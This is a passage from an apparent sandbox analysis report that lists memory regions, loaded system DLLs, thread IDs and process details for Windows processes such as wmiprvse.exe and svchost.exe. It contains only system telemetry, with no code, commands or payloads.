0x7ffae9470000 end_va = 0x7ffae9483fff entry_point = 0x7ffae9470000 region_type = mapped_file name = "wbemsvc.dll" filename = "\\Windows\\System32\\wbem\\wbemsvc.dll" (normalized: "c:\\windows\\system32\\wbem\\wbemsvc.dll") Region: id = 1373 start_va = 0x7ffae9490000 end_va = 0x7ffae9587fff entry_point = 0x7ffae9490000 region_type = mapped_file name = "fastprox.dll" filename = "\\Windows\\System32\\wbem\\fastprox.dll" (normalized: "c:\\windows\\system32\\wbem\\fastprox.dll") Region: id = 1374 start_va = 0x7ffae9fa0000 end_va = 0x7ffae9fb0fff entry_point = 0x7ffae9fa0000 region_type = mapped_file name = "wbemprox.dll" filename = "\\Windows\\System32\\wbem\\wbemprox.dll" (normalized: "c:\\windows\\system32\\wbem\\wbemprox.dll") Region: id = 1375 start_va = 0x7ffaf3960000 end_va = 0x7ffaf3992fff entry_point = 0x7ffaf3960000 region_type = mapped_file name = "rsaenh.dll" filename = "\\Windows\\System32\\rsaenh.dll" (normalized: "c:\\windows\\system32\\rsaenh.dll") Region: id = 1376 start_va = 0x7ffaf3d00000 end_va = 0x7ffaf3d16fff entry_point = 0x7ffaf3d00000 region_type = mapped_file name = "cryptsp.dll" filename = "\\Windows\\System32\\cryptsp.dll" (normalized: "c:\\windows\\system32\\cryptsp.dll") Region: id = 1377 start_va = 0x7ffaf41e0000 end_va = 0x7ffaf41eafff entry_point = 0x7ffaf41e0000 region_type = mapped_file name = "cryptbase.dll" filename = "\\Windows\\System32\\cryptbase.dll" (normalized: "c:\\windows\\system32\\cryptbase.dll") Region: id = 1378 start_va = 0x7ffaf4290000 end_va = 0x7ffaf42fafff entry_point = 0x7ffaf4290000 region_type = mapped_file name = "bcryptprimitives.dll" filename = "\\Windows\\System32\\bcryptprimitives.dll" (normalized: "c:\\windows\\system32\\bcryptprimitives.dll") Region: id = 1379 start_va = 0x7ffaf44d0000 end_va = 0x7ffaf44defff entry_point = 0x7ffaf44d0000 region_type = mapped_file name = "kernel.appcore.dll" filename = "\\Windows\\System32\\kernel.appcore.dll" (normalized: "c:\\windows\\system32\\kernel.appcore.dll") Region: id = 1380 start_va = 0x7ffaf5140000 end_va = 0x7ffaf528dfff entry_point = 0x7ffaf5140000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 1381 start_va = 0x7ffaf5800000 end_va = 0x7ffaf5984fff entry_point = 0x7ffaf5800000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 1382 start_va = 0x7ffaf6ec0000 end_va = 0x7ffaf6f64fff entry_point = 0x7ffaf6ec0000 region_type = mapped_file name = "clbcatq.dll" filename = "\\Windows\\System32\\clbcatq.dll" (normalized: "c:\\windows\\system32\\clbcatq.dll") Region: id = 1383 start_va = 0x7ffaf7180000 end_va = 0x7ffaf7187fff entry_point = 0x7ffaf7180000 region_type = mapped_file name = "psapi.dll" filename = "\\Windows\\System32\\psapi.dll" (normalized: "c:\\windows\\system32\\psapi.dll") Region: id = 1384 start_va = 0x7ffaf7190000 end_va = 0x7ffaf724dfff entry_point = 0x7ffaf7190000 region_type = mapped_file name = "oleaut32.dll" filename = "\\Windows\\System32\\oleaut32.dll" (normalized: "c:\\windows\\system32\\oleaut32.dll") Region: id = 1830 start_va = 0x7ffaf37e0000 end_va = 0x7ffaf3811fff entry_point = 0x7ffaf37e0000 region_type = mapped_file name = "ntmarta.dll" filename = "\\Windows\\System32\\ntmarta.dll" (normalized: "c:\\windows\\system32\\ntmarta.dll") Region: id = 1831 start_va = 0x7ffaf75d0000 end_va = 0x7ffaf7675fff entry_point = 0x7ffaf75d0000 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Thread: id = 130 os_tid = 0xac8 Thread: id = 131 os_tid = 0xcc0 Thread: id = 132 os_tid = 0xda8 Thread: id = 133 os_tid = 0xce0 Thread: id = 134 os_tid = 0xbf4 Thread: id = 135 os_tid = 0x57c Thread: id = 194 os_tid = 0xea4 Process: id = "7" image_name = "wmiprvse.exe" filename = "c:\\windows\\system32\\wbem\\wmiprvse.exe" page_root = "0x5706f000" os_pid = "0xf50" os_integrity_level = "0x4000" os_privileges = "0xe60b1e890" monitor_reason = "rpc_server" parent_id = "2" os_parent_pid = "0x318" cmd_line = "C:\\Windows\\system32\\wbem\\wmiprvse.exe -Embedding" cur_dir = "C:\\Windows\\system32\\" os_username = "NT AUTHORITY\\SYSTEM" os_groups = "Everyone" [0x7], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\SERVICE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT SERVICE\\BDESVC" [0xe], "NT SERVICE\\BITS" [0xe], "NT SERVICE\\CertPropSvc" [0xa], "NT SERVICE\\DcpSvc" [0xa], "NT SERVICE\\dmwappushservice" [0xa], "NT SERVICE\\DoSvc" [0xa], "NT SERVICE\\DsmSvc" [0xa], "NT SERVICE\\EapHost" [0xa], "NT SERVICE\\IKEEXT" [0xa], "NT SERVICE\\iphlpsvc" [0xe], "NT SERVICE\\LanmanServer" [0xe], "NT SERVICE\\lfsvc" [0xa], "NT SERVICE\\MSiSCSI" [0xa], "NT SERVICE\\NcaSvc" [0xa], "NT SERVICE\\NetSetupSvc" [0xa], "NT SERVICE\\RasAuto" [0xa], "NT SERVICE\\RasMan" [0xa], "NT SERVICE\\RemoteAccess" [0xa], "NT SERVICE\\RetailDemo" [0xa], "NT SERVICE\\Schedule" [0xe], "NT SERVICE\\SCPolicySvc" [0xa], "NT SERVICE\\SENS" [0xe], "NT SERVICE\\SessionEnv" [0xa], "NT SERVICE\\SharedAccess" [0xa], "NT SERVICE\\ShellHWDetection" [0xe], "NT SERVICE\\UsoSvc" [0xa], "NT SERVICE\\wercplsupport" [0xa], "NT SERVICE\\Winmgmt" [0xe], "NT SERVICE\\wlidsvc" [0xa], "NT SERVICE\\wuauserv" [0xe], "NT SERVICE\\XboxNetApiSvc" [0xa], "NT AUTHORITY\\Logon Session 00000000:0000b566" [0xc0000007], "LOCAL" [0x7], "BUILTIN\\Administrators" [0xe] Region: id = 1385 start_va = 0x7ffe0000 end_va = 0x7ffeffff entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 1386 start_va = 0xbd634d0000 end_va = 0xbd634effff entry_point = 0x0 region_type = private name = "private_0x000000bd634d0000" filename = "" Region: id = 1387 start_va = 0xbd634f0000 end_va = 0xbd63503fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000bd634f0000" filename = "" Region: id = 1388 start_va = 0xbd63510000 end_va = 0xbd6358ffff entry_point = 0x0 region_type = private name = "private_0x000000bd63510000" filename = "" Region: id = 1389 start_va = 0xbd63590000 end_va = 0xbd63593fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000bd63590000" filename = "" Region: id = 1390 start_va = 0xbd635a0000 end_va = 0xbd635a0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000bd635a0000" filename = "" Region: id = 1391 start_va = 0xbd635b0000 end_va = 0xbd635b1fff entry_point = 0x0 region_type = private name = "private_0x000000bd635b0000" filename = "" Region: id = 1392 start_va = 0x7df5ffb00000 end_va = 0x7ff5ffafffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007df5ffb00000" filename = "" Region: id = 1393 start_va = 0x7ff702b30000 end_va = 0x7ff702b52fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007ff702b30000" filename = "" Region: id = 1394 start_va = 0x7ff702b57000 end_va = 0x7ff702b57fff entry_point = 0x0 region_type = private name = "private_0x00007ff702b57000" filename = "" Region: id = 1395 start_va = 0x7ff702b5e000 end_va = 0x7ff702b5ffff entry_point = 0x0 region_type = private name = "private_0x00007ff702b5e000" filename = "" Region: id = 1396 start_va = 0x7ff702dc0000 end_va = 0x7ff702e3efff entry_point = 0x7ff702dc0000 region_type = mapped_file name = "wmiprvse.exe" filename = "\\Windows\\System32\\wbem\\WmiPrvSE.exe" (normalized: "c:\\windows\\system32\\wbem\\wmiprvse.exe") Region: id = 1397 start_va = 0x7ffaf7a10000 end_va = 0x7ffaf7bd1fff entry_point = 0x7ffaf7a10000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 1398 start_va = 0xbd63780000 end_va = 0xbd6387ffff entry_point = 0x0 region_type = private name = "private_0x000000bd63780000" filename = "" Region: id = 1399 start_va = 0x7ffaf4e50000 end_va = 0x7ffaf502cfff entry_point = 0x7ffaf4e50000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 1400 start_va = 0x7ffaf70d0000 end_va = 0x7ffaf717cfff entry_point = 0x7ffaf70d0000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 1401 start_va = 0xbd634d0000 end_va = 0xbd634dffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000bd634d0000" filename = "" Region: id = 1402 start_va = 0xbd634e0000 end_va = 0xbd634e6fff entry_point = 0x0 region_type = private name = "private_0x000000bd634e0000" filename = "" Region: id = 1403 start_va = 0xbd635c0000 end_va = 0xbd6367dfff entry_point = 0xbd635c0000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 1404 start_va = 0xbd63680000 end_va = 0xbd636fffff entry_point = 0x0 region_type = private name = "private_0x000000bd63680000" filename = "" Region: id = 1405 start_va = 0xbd63700000 end_va = 0xbd63706fff entry_point = 0x0 region_type = private name = "private_0x000000bd63700000" filename = "" Region: id = 1406 start_va = 0xbd63710000 end_va = 0xbd63710fff entry_point = 0x0 region_type = private name = "private_0x000000bd63710000" filename = "" Region: id = 1407 start_va = 0xbd63720000 end_va = 0xbd63720fff entry_point = 0x0 region_type = private name = "private_0x000000bd63720000" filename = "" Region: id = 1408 start_va = 0xbd63730000 end_va = 0xbd63734fff entry_point = 0xbd63730000 region_type = mapped_file name = "user32.dll.mui" filename = "\\Windows\\System32\\en-US\\user32.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\user32.dll.mui") Region: id = 1409 start_va = 0xbd63740000 end_va = 0xbd63740fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000bd63740000" filename = "" Region: id = 1410 start_va = 0xbd63750000 end_va = 0xbd63750fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000bd63750000" filename = "" Region: id = 1411 start_va = 0xbd63760000 end_va = 0xbd63760fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000bd63760000" filename = "" Region: id = 1412 start_va = 0xbd63880000 end_va = 0xbd63a07fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000bd63880000" filename = "" Region: id = 1413 start_va = 0xbd63a60000 end_va = 0xbd63a6ffff entry_point = 0x0 region_type = private name = "private_0x000000bd63a60000" filename = "" Region: id = 1414 start_va = 0xbd63a70000 end_va = 0xbd63da6fff entry_point = 0xbd63a70000 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Region: id = 1415 start_va = 0xbd63db0000 end_va = 0xbd63f30fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000bd63db0000" filename = "" Region: id = 1416 start_va = 0xbd63f40000 end_va = 0xbd63ffffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000bd63f40000" filename = "" Region: id = 1417 start_va = 0xbd64000000 end_va = 0xbd6407ffff entry_point = 0x0 region_type = private name = "private_0x000000bd64000000" filename = "" Region: id = 1418 start_va = 0xbd64080000 end_va = 0xbd6417ffff entry_point = 0x0 region_type = private name = "private_0x000000bd64080000" filename = "" Region: id = 1419 start_va = 0x7ff702a30000 end_va = 0x7ff702b2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007ff702a30000" filename = "" Region: id = 1420 start_va = 0x7ff702b5a000 end_va = 0x7ff702b5bfff entry_point = 0x0 region_type = private name = "private_0x00007ff702b5a000" filename = "" Region: id = 1421 start_va = 0x7ff702b5c000 end_va = 0x7ff702b5dfff entry_point = 0x0 region_type = private name = "private_0x00007ff702b5c000" filename = "" Region: id = 1422 start_va = 0x7ffae92d0000 end_va = 0x7ffae92e5fff entry_point = 0x7ffae92d0000 region_type = mapped_file name = "ncobjapi.dll" filename = "\\Windows\\System32\\ncobjapi.dll" (normalized: "c:\\windows\\system32\\ncobjapi.dll") Region: id = 1423 start_va = 0x7ffae9490000 end_va = 0x7ffae9587fff entry_point = 0x7ffae9490000 region_type = mapped_file name = "fastprox.dll" filename = "\\Windows\\System32\\wbem\\fastprox.dll" (normalized: "c:\\windows\\system32\\wbem\\fastprox.dll") Region: id = 1424 start_va = 0x7ffae9fa0000 end_va = 0x7ffae9fb0fff entry_point = 0x7ffae9fa0000 region_type = mapped_file name = "wbemprox.dll" filename = "\\Windows\\System32\\wbem\\wbemprox.dll" (normalized: "c:\\windows\\system32\\wbem\\wbemprox.dll") Region: id = 1425 start_va = 0x7ffaef560000 end_va = 0x7ffaef5defff entry_point = 0x7ffaef560000 region_type = mapped_file name = "wbemcomn.dll" filename = "\\Windows\\System32\\wbemcomn.dll" (normalized: "c:\\windows\\system32\\wbemcomn.dll") Region: id = 1426 start_va = 0x7ffaf4260000 end_va = 0x7ffaf4287fff entry_point = 0x7ffaf4260000 region_type = mapped_file name = "bcrypt.dll" filename = "\\Windows\\System32\\bcrypt.dll" (normalized: "c:\\windows\\system32\\bcrypt.dll") Region: id = 1427 start_va = 0x7ffaf4290000 end_va = 0x7ffaf42fafff entry_point = 0x7ffaf4290000 region_type = mapped_file name = "bcryptprimitives.dll" filename = "\\Windows\\System32\\bcryptprimitives.dll" (normalized: "c:\\windows\\system32\\bcryptprimitives.dll") Region: id = 1428 start_va = 0x7ffaf44d0000 end_va = 0x7ffaf44defff entry_point = 0x7ffaf44d0000 region_type = mapped_file name = "kernel.appcore.dll" filename = "\\Windows\\System32\\kernel.appcore.dll" (normalized: "c:\\windows\\system32\\kernel.appcore.dll") Region: id = 1429 start_va = 0x7ffaf5140000 end_va = 0x7ffaf528dfff entry_point = 0x7ffaf5140000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 1430 start_va = 0x7ffaf5290000 end_va = 0x7ffaf53b5fff entry_point = 0x7ffaf5290000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 1431 start_va = 0x7ffaf5700000 end_va = 0x7ffaf579cfff entry_point = 0x7ffaf5700000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 1432 start_va = 0x7ffaf57a0000 end_va = 0x7ffaf57fafff entry_point = 0x7ffaf57a0000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 1433 start_va = 0x7ffaf5800000 end_va = 0x7ffaf5984fff entry_point = 0x7ffaf5800000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 1434 start_va = 0x7ffaf6ec0000 end_va = 0x7ffaf6f64fff entry_point = 0x7ffaf6ec0000 region_type = mapped_file name = "clbcatq.dll" filename = "\\Windows\\System32\\clbcatq.dll" (normalized: "c:\\windows\\system32\\clbcatq.dll") Region: id = 1435 start_va = 0x7ffaf7190000 end_va = 0x7ffaf724dfff entry_point = 0x7ffaf7190000 region_type = mapped_file name = "oleaut32.dll" filename = "\\Windows\\System32\\oleaut32.dll" (normalized: "c:\\windows\\system32\\oleaut32.dll") Region: id = 1436 start_va = 0x7ffaf72e0000 end_va = 0x7ffaf755bfff entry_point = 0x7ffaf72e0000 region_type = mapped_file name = "combase.dll" filename = "\\Windows\\System32\\combase.dll" (normalized: "c:\\windows\\system32\\combase.dll") Region: id = 1437 start_va = 0x7ffaf7560000 end_va = 0x7ffaf75c8fff entry_point = 0x7ffaf7560000 region_type = mapped_file name = "ws2_32.dll" filename = "\\Windows\\System32\\ws2_32.dll" (normalized: "c:\\windows\\system32\\ws2_32.dll") Region: id = 1438 start_va = 0x7ffaf75d0000 end_va = 0x7ffaf7675fff entry_point = 0x7ffaf75d0000 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 1439 start_va = 0x7ffaf7680000 end_va = 0x7ffaf7687fff entry_point = 0x7ffaf7680000 region_type = mapped_file name = "nsi.dll" filename = "\\Windows\\System32\\nsi.dll" (normalized: "c:\\windows\\system32\\nsi.dll") Region: id = 1440 start_va = 0xbd64180000 end_va = 0xbd641fffff entry_point = 0x0 region_type = private name = "private_0x000000bd64180000" filename = "" Region: id = 1441 start_va = 0xbd64200000 end_va = 0xbd6427ffff entry_point = 0x0 region_type = private name = "private_0x000000bd64200000" filename = "" Region: id = 1442 start_va = 0xbd64280000 end_va = 0xbd642fffff entry_point = 0x0 region_type = private name = "private_0x000000bd64280000" filename = "" Region: id = 1443 start_va = 0xbd64300000 end_va = 0xbd6437ffff entry_point = 0x0 region_type = private name = "private_0x000000bd64300000" filename = "" Region: id = 1444 start_va = 0xbd64380000 end_va = 0xbd643fffff entry_point = 0x0 region_type = private name = "private_0x000000bd64380000" filename = "" Region: id = 1445 start_va = 0xbd64400000 end_va = 0xbd6447ffff entry_point = 0x0 region_type = private name = "private_0x000000bd64400000" filename = "" Region: id = 1446 start_va = 0x7ff702a2a000 end_va = 0x7ff702a2bfff entry_point = 0x0 region_type = private name = "private_0x00007ff702a2a000" filename = "" Region: id = 1447 start_va = 0x7ff702a2c000 end_va = 0x7ff702a2dfff entry_point = 0x0 region_type = private name = "private_0x00007ff702a2c000" filename = "" Region: id = 1448 start_va = 0x7ff702a2e000 end_va = 0x7ff702a2ffff entry_point = 0x0 region_type = private name = "private_0x00007ff702a2e000" filename = "" Region: id = 1449 start_va = 0x7ff702b53000 end_va = 0x7ff702b54fff entry_point = 0x0 region_type = private name = "private_0x00007ff702b53000" filename = "" Region: id = 1450 start_va = 0x7ff702b55000 end_va = 0x7ff702b56fff entry_point = 0x0 region_type = private name = "private_0x00007ff702b55000" filename = "" Region: id = 1451 start_va = 0x7ff702b58000 end_va = 0x7ff702b59fff entry_point = 0x0 region_type = private name = "private_0x00007ff702b58000" filename = "" Region: id = 1452 start_va = 0x7ffae9440000 end_va = 0x7ffae9464fff entry_point = 0x7ffae9440000 region_type = mapped_file name = "wmiutils.dll" filename = "\\Windows\\System32\\wbem\\wmiutils.dll" (normalized: "c:\\windows\\system32\\wbem\\wmiutils.dll") Region: id = 1453 start_va = 0x7ffae9470000 end_va = 0x7ffae9483fff entry_point = 0x7ffae9470000 region_type = mapped_file name = "wbemsvc.dll" filename = "\\Windows\\System32\\wbem\\wbemsvc.dll" (normalized: "c:\\windows\\system32\\wbem\\wbemsvc.dll") Region: id = 1454 start_va = 0x7ffaf0490000 end_va = 0x7ffaf04ccfff entry_point = 0x7ffaf0490000 region_type = mapped_file name = "wmiprov.dll" filename = "\\Windows\\System32\\wbem\\wmiprov.dll" (normalized: "c:\\windows\\system32\\wbem\\wmiprov.dll") Region: id = 1455 start_va = 0x7ffaf37e0000 end_va = 0x7ffaf3811fff entry_point = 0x7ffaf37e0000 region_type = mapped_file name = "ntmarta.dll" filename = "\\Windows\\System32\\ntmarta.dll" (normalized: "c:\\windows\\system32\\ntmarta.dll") Region: id = 1456 start_va = 0x7ffaf3960000 end_va = 0x7ffaf3992fff entry_point = 0x7ffaf3960000 region_type = mapped_file name = "rsaenh.dll" filename = "\\Windows\\System32\\rsaenh.dll" (normalized: "c:\\windows\\system32\\rsaenh.dll") Region: id = 1457 start_va = 0x7ffaf3d00000 end_va = 0x7ffaf3d16fff entry_point = 0x7ffaf3d00000 region_type = mapped_file name = "cryptsp.dll" filename = "\\Windows\\System32\\cryptsp.dll" (normalized: "c:\\windows\\system32\\cryptsp.dll") Region: id = 1458 start_va = 0x7ffaf41e0000 end_va = 0x7ffaf41eafff entry_point = 0x7ffaf41e0000 region_type = mapped_file name = "cryptbase.dll" filename = "\\Windows\\System32\\cryptbase.dll" (normalized: "c:\\windows\\system32\\cryptbase.dll") Region: id = 1459 start_va = 0xbd63a10000 end_va = 0xbd63a57fff entry_point = 0xbd63a10000 region_type = mapped_file name = "advapi32.dll.mui" filename = "\\Windows\\System32\\en-US\\advapi32.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\advapi32.dll.mui") Region: id = 1460 start_va = 0x7ffaf0220000 end_va = 0x7ffaf0260fff entry_point = 0x7ffaf0220000 region_type = mapped_file name = "mofd.dll" filename = "\\Windows\\System32\\wbem\\mofd.dll" (normalized: "c:\\windows\\system32\\wbem\\mofd.dll") Region: id = 1461 start_va = 0x7ffaf1420000 end_va = 0x7ffaf1430fff entry_point = 0x7ffaf1420000 region_type = mapped_file name = "wmiclnt.dll" filename = "\\Windows\\System32\\wmiclnt.dll" (normalized: "c:\\windows\\system32\\wmiclnt.dll") Thread: id = 138 os_tid = 0x7f0 Thread: id = 139 os_tid = 0x67c Thread: id = 140 os_tid = 0xb6c Thread: id = 141 os_tid = 0x5b8 Thread: id = 142 os_tid = 0x7f4 Thread: id = 143 os_tid = 0x5c8 Thread: id = 144 os_tid = 0xef8 Thread: id = 145 os_tid = 0xef4 Thread: id = 146 os_tid = 0x578 Process: id = "8" image_name = "svchost.exe" filename = "c:\\windows\\system32\\svchost.exe" page_root = "0x47dd1000" os_pid = "0x340" os_integrity_level = "0x4000" os_privileges = "0x60800000" monitor_reason = "rpc_server" parent_id = "2" os_parent_pid = "0x318" cmd_line = "C:\\Windows\\System32\\svchost.exe -k LocalServiceNetworkRestricted" cur_dir = "C:\\Windows\\system32\\" os_username = "NT AUTHORITY\\Local Service" os_groups = "Everyone" [0x7], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\SERVICE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT SERVICE\\AppIDSvc" [0xa], "NT SERVICE\\Audiosrv" [0xa], "NT SERVICE\\Dhcp" [0xa], "NT SERVICE\\eventlog" [0xe], "NT SERVICE\\HomeGroupProvider" [0xa], "NT SERVICE\\icssvc" [0xa], "NT SERVICE\\lmhosts" [0xa], "NT SERVICE\\NgcCtnrSvc" [0xa], "NT SERVICE\\vmictimesync" [0xa], "NT SERVICE\\Wcmsvc" [0xa], "NT SERVICE\\wscsvc" [0xa], "NT AUTHORITY\\Logon Session 00000000:0000e1df" [0xc000000f], "LOCAL" [0x7] Region: id = 1462 start_va = 0x7ffe0000 end_va = 0x7ffeffff entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 1463 start_va = 0xd39bb60000 end_va = 0xd39bb6ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000d39bb60000" filename = "" Region: id = 1464 start_va = 0xd39bb70000 end_va = 0xd39bb70fff entry_point = 0xd39bb70000 region_type = mapped_file name = "svchost.exe.mui" filename = "\\Windows\\System32\\en-US\\svchost.exe.mui" (normalized: "c:\\windows\\system32\\en-us\\svchost.exe.mui") Region: id = 1465 start_va = 0xd39bb80000 end_va = 0xd39bb93fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000d39bb80000" filename = "" Region: id = 1466 start_va = 0xd39bba0000 end_va = 0xd39bc1ffff entry_point = 0x0 region_type = private name = "private_0x000000d39bba0000" filename = "" Region: id = 1467 start_va = 0xd39bc20000 end_va = 0xd39bc23fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000d39bc20000" filename = "" Region: id = 1468 start_va = 0xd39bc30000 end_va = 0xd39bc30fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000d39bc30000" filename = "" Region: id = 1469 start_va = 0xd39bc40000 end_va = 0xd39bc41fff entry_point = 0x0 region_type = private name = "private_0x000000d39bc40000" filename = "" Region: id = 1470 start_va = 0xd39bc50000 end_va = 0xd39bd0dfff entry_point = 0xd39bc50000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 1471 start_va = 0xd39bd10000 end_va = 0xd39bd10fff entry_point = 0x0 region_type = private name = "private_0x000000d39bd10000" filename = "" Region: id = 1472 start_va = 0xd39bd20000 end_va = 0xd39bd26fff entry_point = 0x0 region_type = private name = "private_0x000000d39bd20000" filename = "" Region: id = 1473 start_va = 0xd39bd30000 end_va = 0xd39bd30fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000d39bd30000" filename = "" Region: id = 1474 start_va = 0xd39bd40000 end_va = 0xd39bd40fff entry_point = 0x0 region_type = private name = "private_0x000000d39bd40000" filename = "" Region: id = 1475 start_va = 0xd39bdb0000 end_va = 0xd39bdb0fff entry_point = 0x0 region_type = private name = "private_0x000000d39bdb0000" filename = "" Region: id = 1476 start_va = 0xd39bdc0000 end_va = 0xd39bdc0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000d39bdc0000" filename = "" Region: id = 1477 start_va = 0xd39bdd0000 end_va = 0xd39bdd6fff entry_point = 0x0 region_type = private name = "private_0x000000d39bdd0000" filename = "" Region: id = 1478 start_va = 0xd39bde0000 end_va = 0xd39bdfffff entry_point = 0x0 region_type = private name = "private_0x000000d39bde0000" filename = "" Region: id = 1479 start_va = 0xd39be00000 end_va = 0xd39befffff entry_point = 0x0 region_type = private name = "private_0x000000d39be00000" filename = "" Region: id = 1480 start_va = 0xd39bf00000 end_va = 0xd39bfbffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000d39bf00000" filename = "" Region: id = 1481 start_va = 0xd39bfc0000 end_va = 0xd39c024fff entry_point = 0xd39bfc0000 region_type = mapped_file name = "wevtapi.dll" filename = "\\Windows\\System32\\wevtapi.dll" (normalized: "c:\\windows\\system32\\wevtapi.dll") Region: id = 1482 start_va = 0xd39c030000 end_va = 0xd39c030fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000d39c030000" filename = "" Region: id = 1483 start_va = 0xd39c040000 end_va = 0xd39c040fff entry_point = 0x0 region_type = private name = "private_0x000000d39c040000" filename = "" Region: id = 1484 start_va = 0xd39c050000 end_va = 0xd39c050fff entry_point = 0x0 region_type = private name = "private_0x000000d39c050000" filename = "" Region: id = 1485 start_va = 0xd39c060000 end_va = 0xd39c066fff entry_point = 0x0 region_type = private name = "private_0x000000d39c060000" filename = "" Region: id = 1486 start_va = 0xd39c070000 end_va = 0xd39c0effff entry_point = 0x0 region_type = private name = "private_0x000000d39c070000" filename = "" Region: id = 1487 start_va = 0xd39c0f0000 end_va = 0xd39c0f0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000d39c0f0000" filename = "" Region: id = 1488 start_va = 0xd39c100000 end_va = 0xd39c1fffff entry_point = 0x0 region_type = private name = "private_0x000000d39c100000" filename = "" Region: id = 1489 start_va = 0xd39c200000 end_va = 0xd39c387fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000d39c200000" filename = "" Region: id = 1490 start_va = 0xd39c390000 end_va = 0xd39c510fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000d39c390000" filename = "" Region: id = 1491 start_va = 0xd39c520000 end_va = 0xd39c59ffff entry_point = 0x0 region_type = private name = "private_0x000000d39c520000" filename = "" Region: id = 1492 start_va = 0xd39c5a0000 end_va = 0xd39c61ffff entry_point = 0x0 region_type = private name = "private_0x000000d39c5a0000" filename = "" Region: id = 1493 start_va = 0xd39c720000 end_va = 0xd39c79ffff entry_point = 0x0 region_type = private name = "private_0x000000d39c720000" filename = "" Region: id = 1494 start_va = 0xd39c7a0000 end_va = 0xd39c7bffff entry_point = 0x0 region_type = private name = "private_0x000000d39c7a0000" filename = "" Region: id = 1495 start_va = 0xd39c7c0000 end_va = 0xd39c7dffff entry_point = 0x0 region_type = private name = "private_0x000000d39c7c0000" filename = "" Region: id = 1496 start_va = 0xd39c7e0000 end_va = 0xd39c7e4fff entry_point = 0xd39c7e0000 region_type = mapped_file name = "pcaevts.dll" filename = "\\Windows\\System32\\pcaevts.dll" (normalized: "c:\\windows\\system32\\pcaevts.dll") Region: id = 1497 start_va = 0xd39c800000 end_va = 0xd39c8fffff entry_point = 0x0 region_type = private name = "private_0x000000d39c800000" filename = "" Region: id = 1498 start_va = 0xd39c900000 end_va = 0xd39c9fffff entry_point = 0x0 region_type = private name = "private_0x000000d39c900000" filename = "" Region: id = 1499 start_va = 0xd39cb00000 end_va = 0xd39cb7ffff entry_point = 0x0 region_type = private name = "private_0x000000d39cb00000" filename = "" Region: id = 1500 start_va = 0xd39cb80000 end_va = 0xd39cbfffff entry_point = 0x0 region_type = private name = "private_0x000000d39cb80000" filename = "" Region: id = 1501 start_va = 0xd39cc00000 end_va = 0xd39ccfffff 